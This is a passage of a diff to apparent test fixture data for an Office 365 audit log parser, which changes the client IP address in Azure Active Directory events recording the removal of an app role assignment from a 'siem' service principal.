19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -3891,9 +3891,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-09T15:34:47",
 "ExtendedProperties": [
 {
@@ -4127,7 +4127,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -4157,9 +4157,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-09T15:34:47",
 "ExtendedProperties": [
 {
@@ -4393,7 +4393,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
